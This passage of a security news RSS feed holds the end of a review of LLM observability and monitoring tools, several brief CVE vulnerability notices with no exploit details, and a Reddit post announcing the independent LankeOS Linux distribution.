<p class="wp-block-paragraph"><em>Pricing:</em> “Value-based” table on <a href="https://www.bigpanda.io/pricing/">request</a></p>



<p class="wp-block-paragraph"><em>Standout feature:</em> Automated triage for faster response</p>



<p class="wp-block-paragraph"><em>Best suited for:</em> Large teams seeking to reduce alert fatigue from large customer base</p>



<h2 class="wp-block-heading">Braintrust</h2>



<p class="wp-block-paragraph">Setting up an effective improvement cycle for an AI agent requires a strong feedback loop from production data to the agent’s next generation. <a href="https://www.braintrust.dev/">Braintrust</a> watches the production workload and creates test vectors that expose how an agent may be drifting, regressing, or departing from its path. The tool automates much of the testing and scoring feedback loop so problematic patterns can be discovered and addressed. A core part of the offering is a specialized data store that can track large and sometimes deeply nested collections of tests and their results. Their approach may be summarized by one of their tag lines: “trace everything.”</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Free starter tier; <a href="https://www.braintrust.dev/pricing">Pro plan</a> starts at $249 with some usage-based costs covered</p>



<p class="wp-block-paragraph"><em>Standout feature:</em> Highly scalable trace ingestion</p>



<p class="wp-block-paragraph"><em>Best for:</em> Teams developing strong guardrails through continuous testing</p>



<h2 class="wp-block-heading">Chronicle Labs</h2>



<p class="wp-block-paragraph">When it’s time to release a new version of an agent into the wild, the <a href="https://chronicle-labs.com/">platform from Chronicle Labs </a>specializes in staging it and testing it with a collection of use tests and regression cases. The tools are also helpful during development cycles. “Backtest your agent against reality,” their sales material promises, with a set of tools that mines the production telemetry for solid test vectors that stress every part of the agent with prompts and challenges that the agent will encounter after leaving the safety of the lab.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> On <a href="https://chronicle-labs.com/book-call">request</a></p>



<p class="wp-block-paragraph"><em>Standout feature:</em> Back-testing options for complex testing regimes</p>



<p class="wp-block-paragraph"><em>Best for:</em> Teams chasing strong models with good fidelity to reality</p>



<h2 class="wp-block-heading">Comet Opik</h2>



<p class="wp-block-paragraph">Building a dashboard for tracking every in-flow and out-flow to agents is one way to be ready to watch for and solve problems. <a href="https://www.comet.com/site/products/opik/">Opik from Comet </a>is just such a tool. The DevOps teams can track each call and add its own automated routines to examine the results, score them based on 30-plus metrics, and if desired, send it off to another LLM to evaluate the results. Agents that are constantly failing stand out. DevOps teams can also ask questions like, “Who is using this model and racking up all of the bills?” The same goes for MCP skills and other cogs in the machine.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Free tiers for open source and small projects; <a href="https://www.comet.com/site/pricing/">Pro plan</a> starts at $19 per month with usage limits</p>



<p class="wp-block-paragraph"><em>Standout feature:</em> Auto-scoring with 30-plus metrics for evaluating traces</p>



<p class="wp-block-paragraph"><em>Best for:</em> Teams focusing on RAG and agentic workflows</p>



<h2 class="wp-block-heading">Datadog</h2>



<p class="wp-block-paragraph">DevOps teams that rely on <a href="https://www.datadoghq.com/">Datadog</a> to track logs across collections of services can also use it to track LLM operations, which are, of course, just another source and sink for data. It will track performance such as time to first token and offer insight into what might be causing an issue, such as lack of memory. Results then get plugged into the same cost-tracking mechanism so the bean counters can predict when the budget will run out. After all, the CFO likely doesn’t care whether the bill comes from an LLM or an old-school S3 storage bucket. Datadog integrates AI into their tools by treating these models as just another source of data.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Small free tier with <a href="https://www.datadoghq.com/pricing/">multiple paid tiers</a> for various levels of enterprise monitoring</p>



<p class="wp-block-paragraph"><em>Standout feature:</em> Large installed base with broad focus on more than LLMs</p>



<p class="wp-block-paragraph"><em>Best for:</em> Large enterprise teams working with established infrastructure</p>



<h2 class="wp-block-heading">Dynatrace</h2>



<p class="wp-block-paragraph">For more than 20 years, <a href="https://www.dynatrace.com/">Dynatrace</a> has been delivering tools that track dataflows across the full stack. Now that AIs are finding roles in many of the nodes in this complex graph, they’re expanding to track how various AI agents can interact. They want to build one platform that helps track the root cause and, often now, deploy solutions autonomously. They want to focus on being ready to support complex networks of agents that detect problems in either performance or security and then work within defined guardrails to fix them. Determining the right role for their own AI-powered agents is a key part of the product.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> <a href="https://www.dynatrace.com/pricing/">Plans</a> start at $7 per month with larger plans designed for full enterprise monitoring</p>



<p class="wp-block-paragraph"><em>Standout feature:</em> High level of autonomous monitoring designed for large installations</p>



<p class="wp-block-paragraph"><em>Best for: </em>Complex, hybrid environments mixing LLMs with traditional services</p>



<h2 class="wp-block-heading">Galileo</h2>



<p class="wp-block-paragraph">Placing some AI systems into production is often a harrowing experience because the actual performance is impossible to predict, even with the most rigorous tests. <a href="https://galileo.ai/">Galileo</a> offers guardrails that track performance and watch for any behavior that deviates from the ground truth. Their “LLM-as-judge” systems are distilled into compact models that can be run locally for lower costs and faster performance.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Small free tier; Pro plans start at $50 per month with usage-based limits and costs</p>



<p class="wp-block-paragraph"><em>Standout feature: </em>Real-time guardrails for deployed agents</p>



<p class="wp-block-paragraph"><em>Best for:</em> Security-conscious installations that need to defend against hallucination and data leakage</p>



<h2 class="wp-block-heading">Grafana Labs</h2>



<p class="wp-block-paragraph">Long the go-to source for<a href="https://grafana.com/oss/"> open source </a>telemetry, <a href="https://grafana.com/products/cloud/ai-assistant/?pg=hp&amp;plcmt=txt-img-alternating">Grafana Labs</a> now tracks performance of AI models in constellations of services. Grafana tracks the evolution of answers across the agentic network to recognize how small changes or hallucinations can spin out of control. It bills its system as “actually useful AI” and has even trademarked it. Its cloud assistant can configure and reconfigure the Grafana dash to offer the right level of observability. Its system includes AI-level analysis that can flag models that are responding quickly but offering bad answers because of problems such as model drift or context degradation.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Basic free tier; <a href="https://grafana.com/pricing/">Pro plan</a> begins at $19 per month, includes better retention and some usage-based fees </p>



<p class="wp-block-paragraph"><em>Standout feature: </em>Full-stack tool with fully integrated LLM tools</p>



<p class="wp-block-paragraph"><em>Best for:</em> Large, enterprise-scale system adding AI</p>



<h2 class="wp-block-heading">Helicone</h2>



<p class="wp-block-paragraph">Sometimes shoehorning in another tool into the chain can be tricky. <a href="https://www.helicone.ai/">Helicone</a> is designed as a smart network proxy that will route all model requests while keeping solid debugging records from the data as it goes by. The data it captures can be turned into nice charts that make it easy to spot latency issues or model failures. Naturally, tracking AI spend is also a feature in much demand as bills continue to climb.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Small free tier; <a href="https://www.helicone.ai/pricing">Pro plan</a> starts at $79 per month, includes features such as team collaboration and improved querying</p>



<p class="wp-block-paragraph"><em>Standout feature:</em> Proxy-based integration</p>



<p class="wp-block-paragraph"><em>Best for:</em> Development teams who want to add better monitoring features quickly</p>



<h2 class="wp-block-heading">Laminar</h2>



<p class="wp-block-paragraph">Tracking agents in development and production means building strong storehouses of data enumerating what happened. <a href="https://laminar.sh/">Laminar</a> works closely with OpenTelemetry to follow agents operating in production so that flaws and failure modes can be understood from log files stored efficiently with their own compression scheme. Developers can search through traces with an SQL-ish language and Laminar’s transcript view illuminates what happened. When necessary, the traces can enable developers to scroll back in time and replay the same inputs for debugging. The goal is to offer deep insights with high-level visibility of how well the agents are meeting business objectives.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Small free tier; “Hobby” tier that adds more features at $30; <a href="https://laminar.sh/pricing">Pro level</a> starts at $150 per month</p>



<p class="wp-block-paragraph"><em>Standout feature:</em> Open-source license makes self-hosting a viable option</p>



<p class="wp-block-paragraph"><em>Best for:</em> Teams fully able to leverage open-source responsibilities</p>



<h2 class="wp-block-heading">LangChain LangSmith</h2>



<p class="wp-block-paragraph">Real-time data from agents is essential for managing any mutli-agent system in production. LangSmith from <a href="https://www.langchain.com/">LangChain</a> traces costs, tools, and progress toward solutions for a wide collection of agents using SDKs for Python, TypeScript, Go, and Java. The OpenTelemetry-based solution watches for anomalies, issuing warnings and alerts through dashboards and communication channels such as PagerDuty. Deeper analysis can reveal issues such as topic clustering or odd patterns of failure. Coordination with agent deployment platforms such as LangGraph and deepagents ensures greater focus on successful resolution of assignments.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Free for solo developers; <a href="https://www.langchain.com/pricing">Pro teams</a> start at $39 per person per month </p>



<p class="wp-block-paragraph"><em>Standout feature:</em> Systematic approach to regression testing of prompts</p>



<p class="wp-block-paragraph"><em>Best for:</em> Teams relying on LangChain and LangGraph frameworks for supporting complex agentic behavior</p>



<h2 class="wp-block-heading">Lunary</h2>



<p class="wp-block-paragraph">Watching the user experience is essential for building AI applications such as chatbots and assistants. <a href="https://lunary.ai/">Lunary</a> offers a proxy that traces all interactions and then builds analytical dashboards for measuring metrics such as user satisfaction or model costs. One common usage is finding frequent topics and looking at the responses to ensure they deliver. When prompts aren’t perfect, Lunary lets teams iterate on the prompt text until the right answers are coming out. Its proxy structure and common API format enables Lunary to promise to work with “any LLM, any framework.”</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Free tier; <a href="https://lunary.ai/pricing">Pro plan</a> starts at $20 per month</p>



<p class="wp-block-paragraph"><em>Standout feature:</em> Deep integration with humans for reviewing and optimizing results</p>



<p class="wp-block-paragraph"><em>Best for:</em> Startups focused on rapid prompt innovation</p>



<h2 class="wp-block-heading">NewRelic</h2>



<p class="wp-block-paragraph">The platform that began tracking performance of some web applications is now powerful enough to track the flows of data through complex agentic ecologies. <a href="https://newrelic.com/platform/ai-observability">NewRelic’s</a> AI-driven monitoring watches for golden signals that can indicate misbehavior or worse throughout the entire lifecycle. It tracks every detail of the interactions through protocols such as MCP and then makes this available to the AI engineers responsible for performance. The dashboard provides the insights necessary to watch for toxic behavior, overt bias, drift, and overblown hallucinations. Predicting and maybe even controlling the cost is also a growing role as tokenomics becomes as important as response time.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Free tier; Pro plan fees available through website</p>



<p class="wp-block-paragraph"><em>Standout feature: </em>Full-stack support with hundreds of integrations with other tools</p>



<p class="wp-block-paragraph"><em>Best for:</em> Established enterprise teams mixing in AI</p>



<h2 class="wp-block-heading">Nova AI Ops</h2>



<p class="wp-block-paragraph">The goal of <a href="https://novaaiops.com/">Nova AI Ops </a>is to deliver a team of agents that watch over a cloud and make it, at least partially, self-healing. Each agent uses a mixture of predictive AI and machine learning to watch cloud telemetry reports for anomalies. Then they calculate the “blast radius” and decide whether this is a problem that can be fixed automatically “while you sleep” or saved for the human supervisors. These tools are aimed not just on LLM operations but on the stack as a whole.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Small free tier; <a href="https://novaaiops.com/pricing">Standard pricing </a> begins at $40 per user per month with usage billing</p>



<p class="wp-block-paragraph"><em>Standout feature:</em> Focus on software reliability engineering helps teams deliver stable stacks</p>



<p class="wp-block-paragraph"><em>Best for:</em> Teams that want to integrate LLMs into incident response and stability management</p>



<h2 class="wp-block-heading">Splunk</h2>



<p class="wp-block-paragraph">The platform that began delivering smart logging is now fully AI capable, offering solutions that can watch over agents with much the same way that it continues to track microservices. <a href="https://www.splunk.com/en_us/solutions/splunk-artificial-intelligence.html">Splunk</a> now includes a fairly large amount of predictive AI for learning from the information in the logs and then turning this learning into fast solutions. This AI assistant can track deployed AI models connected by protocols such as MCP and watch over behavior while delivering the ability for users to drill down and explore what’s working and what’s failing. Their AI Canvas is meant to offer a central hub where the AI scientists can track both the local behavior of the models as well as their role in a larger data ecosystem.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> <a href="https://www.splunk.com/en_us/resources/splunk-pricing-options.html">Activity-based pricing</a> tracks usage of LLM backends and storage</p>



<p class="wp-block-paragraph"><em>Standout feature:</em> Ready to scale to large enterprise stacks</p>



<p class="wp-block-paragraph"><em>Best for:</em> Teams with legacy systems that are folding in agentic options</p>



<h2 class="wp-block-heading">SuperPenguin</h2>



<p class="wp-block-paragraph">One of the most important parts of an AI service is the bill. <a href="https://superpenguin.ai/#features">SuperPenguin</a> is a product designed to track consumption and make predictions so that the CFO won’t be surprised. The goal is to provide solid estimates about the total cost of each product by allocating costs to customers, features, and teams. If there’s a sudden shift, a “spike detector” will raise an alarm so that dev teams can ensure that the AI spend is worth it.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Small free tier for experimentation; Growth tier for teams, starting at $30 per month; <a href="https://superpenguin.ai/#pricing">Pro tier </a>offers deeper options starting at $200 per month</p>



<p class="wp-block-paragraph"><em>Standout feature: </em>Strong accounting with invoice reconciliation and PR-level usage tracking</p>



<p class="wp-block-paragraph"><em>Best for:</em> Teams that need precise cost accounting</p>



<h2 class="wp-block-heading">Vellum</h2>



<p class="wp-block-paragraph">Prompt engineers spend time fussing over the details of tweaking, improving, and enhancing the words that guide the LLM. <a href="https://www.vellum.ai/">Vellum</a> started as a company that would provide the pipeline so that you could manage and improve the prompts that ran again and again. Now the system is growing more powerful, offering a higher level of automation that lets you meta-manage the prompt chain. They’ve also begun marketing it as a form of personal assistant with pre-built connections to many of the major services such as Gmail. Its <a href="https://github.com/vellum-ai/llm-cost-optimizer">llm-cost-optimizer </a>can juggle multiple options while finding a cheaper way to execute a prompt, a process the company suggests can save 60% or more.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Open-source free tier; Pro plan starts at $35 per month</p>



<p class="wp-block-paragraph"><em>Standout feature:</em> Focus on multi-model pipelines for true agentic solutions</p>



<p class="wp-block-paragraph"><em>Best for:</em> Product teams with complex prompt engineering workflows</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-4760 | Oracle Java SE 6u95/7u80/8u45 2D information disclosure (RHSA-2015:1229 / Nessus ID 84930)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Oracle Java SE 6u95/7u80/8u45. Affected by this issue is some unknown functionality of the component 2D. This manipulation causes information disclosure.

This vulnerability appears as CVE-2015-4760. The attack may be initiated ...]]></description>
<link>https://tsecurity.de/de/3672767/sicherheitsluecken/cve-2015-4760-oracle-java-se-6u957u808u45-2d-information-disclosure-rhsa-20151229-nessus-id-84930/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672767/sicherheitsluecken/cve-2015-4760-oracle-java-se-6u957u808u45-2d-information-disclosure-rhsa-20151229-nessus-id-84930/</guid>
<pubDate>Thu, 16 Jul 2026 10:09:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE 6u95/7u80/8u45</a>. Affected by this issue is some unknown functionality of the component <em>2D</em>. This manipulation causes information disclosure.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2015-4760">CVE-2015-4760</a>. The attack may be initiated remotely. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-2141 | WuKongOpenSource WukongCRM up to 11.3.3 URL PermissionServiceImpl.java improper authorization (EUVD-2026-5807)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in WuKongOpenSource WukongCRM up to 11.3.3. This affects an unknown part of the file gateway/src/main/java/com/kakarote/gateway/service/impl/PermissionServiceImpl.java of the component URL Handler. Performing a manipulation results in improper ...]]></description>
<link>https://tsecurity.de/de/3672690/sicherheitsluecken/cve-2026-2141-wukongopensource-wukongcrm-up-to-1133-url-permissionserviceimpljava-improper-authorization-euvd-2026-5807/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672690/sicherheitsluecken/cve-2026-2141-wukongopensource-wukongcrm-up-to-1133-url-permissionserviceimpljava-improper-authorization-euvd-2026-5807/</guid>
<pubDate>Thu, 16 Jul 2026 09:38:22 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/wukongopensource:wukongcrm">WuKongOpenSource WukongCRM up to 11.3.3</a>. This affects an unknown part of the file <em>gateway/src/main/java/com/kakarote/gateway/service/impl/PermissionServiceImpl.java</em> of the component <em>URL Handler</em>. Performing a manipulation results in improper authorization.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-2141">CVE-2026-2141</a>. Remote exploitation of the attack is possible. Furthermore, an exploit is available.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-14685 | HdrHistogram up to 2.2.2 AbstractHistogram AbstractHistogram.java recordValueWithCount state issue (Issue 221)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in HdrHistogram up to 2.2.2. This vulnerability affects the function recordValueWithCount of the file src/main/java/org/HdrHistogram/AbstractHistogram.java of the component AbstractHistogram. Such manipulation of the argument Count l...]]></description>
<link>https://tsecurity.de/de/3672688/sicherheitsluecken/cve-2026-14685-hdrhistogram-up-to-222-abstracthistogram-abstracthistogramjava-recordvaluewithcount-state-issue-issue-221/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672688/sicherheitsluecken/cve-2026-14685-hdrhistogram-up-to-222-abstracthistogram-abstracthistogramjava-recordvaluewithcount-state-issue-issue-221/</guid>
<pubDate>Thu, 16 Jul 2026 09:38:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/hdrhistogram">HdrHistogram up to 2.2.2</a>. This vulnerability affects the function <code>recordValueWithCount</code> of the file <em>src/main/java/org/HdrHistogram/AbstractHistogram.java</em> of the component <em>AbstractHistogram</em>. Such manipulation of the argument <em>Count</em> leads to state issue.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-14685">CVE-2026-14685</a>. The attack can only be performed from a local environment. Furthermore, an exploit is available.

The existence of this vulnerability is still disputed at present.

This issue is disputed due to the potential lack of crossing of security boundaries and the pre-requisites for a successful attack.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-14683 | HdrHistogram up to 2.2.2 AbstractHistogram.java lengthOfCompressedContents memory allocation (Issue 219)]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in HdrHistogram up to 2.2.2. Affected by this issue is the function org.HdrHistogram.AbstractHistogram.decodeFromCompressedByteBuffer of the file src/main/java/org/HdrHistogram/AbstractHistogram.java. The manipulation of the argument lengthOfCom...]]></description>
<link>https://tsecurity.de/de/3672687/sicherheitsluecken/cve-2026-14683-hdrhistogram-up-to-222-abstracthistogramjava-lengthofcompressedcontents-memory-allocation-issue-219/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672687/sicherheitsluecken/cve-2026-14683-hdrhistogram-up-to-222-abstracthistogramjava-lengthofcompressedcontents-memory-allocation-issue-219/</guid>
<pubDate>Thu, 16 Jul 2026 09:38:18 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/hdrhistogram">HdrHistogram up to 2.2.2</a>. Affected by this issue is the function <code>org.HdrHistogram.AbstractHistogram.decodeFromCompressedByteBuffer</code> of the file <em>src/main/java/org/HdrHistogram/AbstractHistogram.java</em>. The manipulation of the argument <em>lengthOfCompressedContents</em> results in uncontrolled memory allocation.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-14683">CVE-2026-14683</a>. The attack needs to be approached locally. In addition, an exploit is available.

It is still unclear if this vulnerability genuinely exists.

This issue is disputed due to the potential lack of crossing of security boundaries and the pre-requisites for a successful attack.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-60828 | WukongCRM 9.0-JAVA fastjson /OaExamine/setOaExamine deserialization]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in WukongCRM 9.0-JAVA. This impacts an unknown function of the file /OaExamine/setOaExamine of the component fastjson. Executing a manipulation can lead to deserialization.

This vulnerability is tracked as CVE-2025-60828. The attack ...]]></description>
<link>https://tsecurity.de/de/3672130/sicherheitsluecken/cve-2025-60828-wukongcrm-90-java-fastjson-oaexaminesetoaexamine-deserialization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672130/sicherheitsluecken/cve-2025-60828-wukongcrm-90-java-fastjson-oaexaminesetoaexamine-deserialization/</guid>
<pubDate>Thu, 16 Jul 2026 02:38:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/wukongcrm">WukongCRM 9.0-JAVA</a>. This impacts an unknown function of the file <em>/OaExamine/setOaExamine</em> of the component <em>fastjson</em>. Executing a manipulation can lead to deserialization.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2025-60828">CVE-2025-60828</a>. The attack is only possible within the local network. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[LankeOS — A fully independent Linux distro built from scratch with a custom C++20 atomic package manager, Linux 7.1.1, and pure Wayland. Come vote for it on DistroWatch!]]></title>
<description><![CDATA[Hi everyone, I’ve been working on a fully independent Linux distribution for the past 5 months – no Debian/Arch/Fedora base, everything built from upstream source using my own toolchain. Now I think it brings something genuinely new to the table. Here is LankeOS, a fully independent Linux distrib...]]></description>
<link>https://tsecurity.de/de/3670775/linux-tipps/lankeos-a-fully-independent-linux-distro-built-from-scratch-with-a-custom-c-20-atomic-package-manager-linux-711-and-pure-wayland-come-vote-for-it-on-distrowatch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670775/linux-tipps/lankeos-a-fully-independent-linux-distro-built-from-scratch-with-a-custom-c-20-atomic-package-manager-linux-711-and-pure-wayland-come-vote-for-it-on-distrowatch/</guid>
<pubDate>Wed, 15 Jul 2026 15:11:50 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi everyone,</p> <p>I’ve been working on a fully independent Linux distribution for the past 5 months – no Debian/Arch/Fedora base, everything built from upstream source using my own toolchain.</p> <p>Now I think it brings something genuinely new to the table.</p> <p>Here is LankeOS, a fully independent Linux distribution built from scratch by a solo developer. If you're tired of "just another Ubuntu/Debian/Arch derivative," this one is genuinely different.</p> <p>What makes LankeOS special</p> <ol> <li>Custom package manager — lpkg (written in C++20)</li> </ol> <p>This is the centerpiece. lpkg is a from-scratch package manager with a WAL atomic transaction system — meaning it can survive power loss mid-install without breaking your system. It includes:</p> <p>- ELF DT_NEEDED verification — validates every shared library dependency against the repo before installing. No "missing .so" surprises.</p> <p>- Ctrl+C handling — the signal waits for current operation + rollback.</p> <p>- 410+ regression tests — including simulated power-loss recovery scenarios.</p> <p>- Aggregated index format — compact single-file index with all version/hash/dep info per package.</p> <p>- Static build support — one binary, runs anywhere.</p> <p>- Package transaction system with WAL-based logging, atomic commit, and rollback support — bringing database-style reliability to traditional mutable Linux package management.</p> <p>- .lpkg format = tar.zst + embedded metadata.json + content/ + hooks/</p> <ol> <li>Not a derivative — built from LFS methodology</li> </ol> <p>LankeOS is not based on Debian, Arch, Fedora, or any existing distro. Every one of its 284 packages is built from upstream source using its own LankeBUILD system. This is a true independent distribution.</p> <p>It supports modern hardware and runs perfectly on my Dell OptiPlex 5000 Micro.</p> <ol> <li>Modern (bleeding edge) software stack</li> </ol> <p>- Linux Kernel 7.1.1</p> <p>- GCC 16.1.1, LLVM/Clang 22.1, glibc 2.42</p> <p>- systemd 257.8</p> <p>- Wayland desktop via niri</p> <p>- PipeWire audio stack, Mesa graphics</p> <p>- Firefox, WebKitGTK, GTK3/4</p> <p>- OpenJDK 25, Node.js, Go, Rust 1.96, Ruby 4.0, Python 3 out of the box</p> <p>- mihomo proxy, fcitx5 Chinese input with CJK fonts</p> <ol> <li>Incredibly lean and fast</li> </ol> <p>- ~4 second boot from power-on to desktop in qemu</p> <p>- Runs on as little as 400-500 MiB RAM</p> <p>- toram kernel parameter copies the entire system to RAM for fully disk-less operation</p> <p>- OverlayFS-based persistent storage via LABEL=LANKE_DATA partition</p> <ol> <li>Smart initramfs with version-aware upgrades</li> </ol> <p>The init script detects version mismatches between the base file and the upper paritition, automatically enters a "live upgrade mode," and notifies the user. Built-in installer (lanke_install) handles GPT formatting, copying, and GRUB setup in one guided flow.</p> <p>Why LankeOS?</p> <p>LankeOS is built around three principles:</p> <p>### 1. Engineering first</p> <p>Instead of focusing on visual customization or superficial changes, LankeOS focuses on the underlying engineering of a Linux distribution.</p> <p>It provides its own:</p> <p>- build system (LankeBUILD)</p> <p>- package manager (lpkg)</p> <p>- package format</p> <p>- repository infrastructure</p> <p>- init and upgrade logic</p> <p>Every component exists because it solves a real system engineering problem.</p> <p>### 2. High technical density</p> <p>LankeOS aims to provide a complete development and daily-use environment while keeping the system lightweight.</p> <p>A single installation image includes:</p> <p>- complete C/C++/Rust/Python/Go/Java development toolchains</p> <p>- modern graphics stack (Wayland, Mesa, Vulkan)</p> <p>- multimedia support (PipeWire, FFmpeg)</p> <p>- desktop applications (Firefox, mpv, etc.)</p> <p>- package management and system development tools</p> <p>The goal is not to minimize the number of packages, but to maximize the amount of usable capability per byte.</p> <p>### 3. Stability through controlled complexity</p> <p>Although LankeOS follows a rolling-release model and uses recent upstream software, stability is achieved through strict integration testing.</p> <p>Every release is tested on real hardware, not only virtual machines.</p> <p>The development process includes:</p> <p>- reproducible package builds</p> <p>- dependency verification</p> <p>- regression tests</p> <p>- transaction-safe package operations</p> <p>- real hardware validation</p> <p>LankeOS is designed for users who want the flexibility of a lightweight distribution without sacrificing reliability.</p> <p>It is not another customized Linux image.</p> <p>It is an experiment in building a complete Linux distribution from the foundations up:</p> <p>a system where every layer can be understood, rebuilt, and improved.</p> <p>Links</p> <p>- GitHub: <a href="http://github.com/Wtada233/LankeOS">github.com/Wtada233/LankeOS</a></p> <p>- Package repo: <a href="http://lankerepo.wtada233.top/x86_64">lankerepo.wtada233.top/x86_64</a></p> <p>- Official site: <a href="http://lankeos.wtada233.top/">lankeos.wtada233.top</a></p> <p>- DistroWatch: <a href="https://distrowatch.com/dwres.php?waitingdistro=1104&amp;resource=links#new">https://distrowatch.com/dwres.php?waitingdistro=1104&amp;resource=links#new</a></p> <p>TL;DR: LankeOS is what happens when someone reads LFS anre distro around this" — with a crash-proof C++20 package</p> <p>manager, Linux 7.1.1, Wayland+Xwayland, 284 hand-built packages and a size of 1.24GiB. Go give it a vote on DistroWatch.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Wtada233"> /u/Wtada233 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1uw5yab/lankeos_a_fully_independent_linux_distro_built/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uw5yab/lankeos_a_fully_independent_linux_distro_built/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-23683 | Artemis Java Test Sandbox up to 1.7.5 sandbox (EUVD-2024-0218)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Artemis Java Test Sandbox up to 1.7.5. Impacted is an unknown function. Performing a manipulation results in sandbox issue.

This vulnerability is cataloged as CVE-2024-23683. The attack must originate from the local network. There is no exp...]]></description>
<link>https://tsecurity.de/de/3670620/sicherheitsluecken/cve-2024-23683-artemis-java-test-sandbox-up-to-175-sandbox-euvd-2024-0218/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670620/sicherheitsluecken/cve-2024-23683-artemis-java-test-sandbox-up-to-175-sandbox-euvd-2024-0218/</guid>
<pubDate>Wed, 15 Jul 2026 14:24:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/artemis:java_test_sandbox">Artemis Java Test Sandbox up to 1.7.5</a>. Impacted is an unknown function. Performing a manipulation results in sandbox issue.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2024-23683">CVE-2024-23683</a>. The attack must originate from the local network. There is no exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-23680 | Amazon AWS Encryption SDK for Java up to 1.9.0/2.2.0 ECDSA Signature signature verification (GHSA-55xh-53m6-936r / EUVD-2024-0361)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in Amazon AWS Encryption SDK for Java up to 1.9.0/2.2.0. Affected is an unknown function of the component ECDSA Signature Handler. Such manipulation leads to improper verification of cryptographic signature.

This vulnerability is tr...]]></description>
<link>https://tsecurity.de/de/3670043/sicherheitsluecken/cve-2024-23680-amazon-aws-encryption-sdk-for-java-up-to-190220-ecdsa-signature-signature-verification-ghsa-55xh-53m6-936r-euvd-2024-0361/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670043/sicherheitsluecken/cve-2024-23680-amazon-aws-encryption-sdk-for-java-up-to-190220-ecdsa-signature-signature-verification-ghsa-55xh-53m6-936r-euvd-2024-0361/</guid>
<pubDate>Wed, 15 Jul 2026 10:39:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/amazon:aws_encryption_sdk_for_java">Amazon AWS Encryption SDK for Java up to 1.9.0/2.2.0</a>. Affected is an unknown function of the component <em>ECDSA Signature Handler</em>. Such manipulation leads to improper verification of cryptographic signature.

